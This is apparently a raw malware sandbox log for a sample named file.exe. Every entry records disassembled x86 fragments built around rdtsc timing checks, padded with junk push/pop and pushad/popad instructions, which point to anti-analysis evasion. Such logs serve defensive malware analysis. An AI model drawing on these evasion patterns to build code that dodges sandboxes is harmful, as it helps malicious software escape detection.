Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66BC3D second address: 66BC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F0148C8B7B1h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007F0148C8B7A6h 0x00000018 popad 0x00000019 jo 00007F0148C8B7B2h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66BC6A second address: 66BC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EE6A second address: 66EE86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EE86 second address: 66EE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EE8C second address: 66EE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67073E second address: 670752 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0148B58146h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670752 second address: 670756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670756 second address: 670762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 670762 second address: 67076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0148C8B7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67076C second address: 670770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67932C second address: 679332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679332 second address: 679338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 679338 second address: 67933E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67918B second address: 6791AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58158h 0x00000007 jc 00007F0148B58146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6791AD second address: 6791B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6791B3 second address: 6791BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0148B58146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68253C second address: 682547 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6826ED second address: 6826F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682867 second address: 68286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68286D second address: 68287B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682C44 second address: 682C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682C4A second address: 682C5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F0148B58146h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682C5A second address: 682C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0148C8B7B1h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F0148C8B7A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682E08 second address: 682E0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689999 second address: 6899C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F0148C8B7AAh 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689560 second address: 68956C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0148B58146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6964AF second address: 6964B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6964B3 second address: 6964CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0148B58153h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6964CF second address: 6964D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6964D4 second address: 6964DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A3272 second address: 6A3276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A3276 second address: 6A327A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A327A second address: 6A3284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A76AA second address: 6A76B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A76B8 second address: 6A76BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A76BC second address: 6A76E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0148B5814Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A7201 second address: 6A7205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A7205 second address: 6A720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A720B second address: 6A722B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F0148C8B7A6h 0x0000000e jmp 00007F0148C8B7B2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A722B second address: 6A722F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A722F second address: 6A7235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A73DA second address: 6A73E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0148B58146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A73E6 second address: 6A73EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BE1AF second address: 6BE1B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0148B58146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD150 second address: 6BD156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD3FA second address: 6BD410 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0148B58146h 0x00000008 jmp 00007F0148B5814Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD410 second address: 6BD417 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD56E second address: 6BD59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0148B5814Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F0148B58159h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD59C second address: 6BD5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD871 second address: 6BD875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD875 second address: 6BD88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0148C8B7B1h 0x0000000e jmp 00007F0148C8B7ABh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD88E second address: 6BD893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD893 second address: 6BD89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BD89D second address: 6BD8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDA2D second address: 6BDA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDA33 second address: 6BDA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDA38 second address: 6BDA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0148C8B7A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0148C8B7B5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDA5F second address: 6BDA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDD53 second address: 6BDD57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDD57 second address: 6BDD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDD61 second address: 6BDD67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDEC5 second address: 6BDEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0148B58151h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDEDC second address: 6BDEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6BDEE4 second address: 6BDEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C23B3 second address: 6C23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0148C8B7ACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C27E8 second address: 6C2809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0148B5814Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C2809 second address: 6C28B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0148C8B7B5h 0x00000012 mov dl, 67h 0x00000014 push dword ptr [ebp+122D1B78h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F0148C8B7A8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jmp 00007F0148C8B7AFh 0x00000039 call 00007F0148C8B7A9h 0x0000003e jmp 00007F0148C8B7B4h 0x00000043 push eax 0x00000044 jp 00007F0148C8B7B4h 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e push edi 0x0000004f jbe 00007F0148C8B7ACh 0x00000055 jo 00007F0148C8B7A6h 0x0000005b pop edi 0x0000005c mov eax, dword ptr [eax] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jnl 00007F0148C8B7A6h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C28B3 second address: 6C28B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C28B9 second address: 6C28BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C28BF second address: 6C28C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C28C3 second address: 6C28C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C43A0 second address: 6C43AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C43AA second address: 6C43B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E02F6 second address: 53E02FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E02FA second address: 53E0317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0317 second address: 53E0331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BF72h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0148B5814Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0331 second address: 53E036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0148C8B7B8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E036D second address: 53E0371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0371 second address: 53E0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0377 second address: 53E03C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 780C1B60h 0x00000013 pushfd 0x00000014 jmp 00007F0148B58159h 0x00000019 adc ecx, 419BA066h 0x0000001f jmp 00007F0148B58151h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E03C6 second address: 53E03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E03CC second address: 53E03D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E03D0 second address: 53E03ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0148C8B7B2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E042C second address: 53E045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0148B58157h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E045E second address: 53E04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007F0148C8B7ABh 0x0000000c add ecx, 3DF7811Eh 0x00000012 jmp 00007F0148C8B7B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0148C8B7ADh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0739 second address: 5D073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D073D second address: 5D0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0741 second address: 5D075C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F0148B5814Bh 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0517 second address: 53E051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E051B second address: 53E053C instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0148B58154h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E053C second address: 53E0540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0540 second address: 53E0546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0546 second address: 53E0557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0557 second address: 53E055B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E055B second address: 53E056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E056A second address: 53E0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0583 second address: 53E05F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0148C8B7AEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F0148C8B7AEh 0x00000017 mov si, B991h 0x0000001b pop esi 0x0000001c call 00007F0148C8B7B7h 0x00000021 jmp 00007F0148C8B7B8h 0x00000026 pop ecx 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E05F5 second address: 53E05F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E05F9 second address: 53E05FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
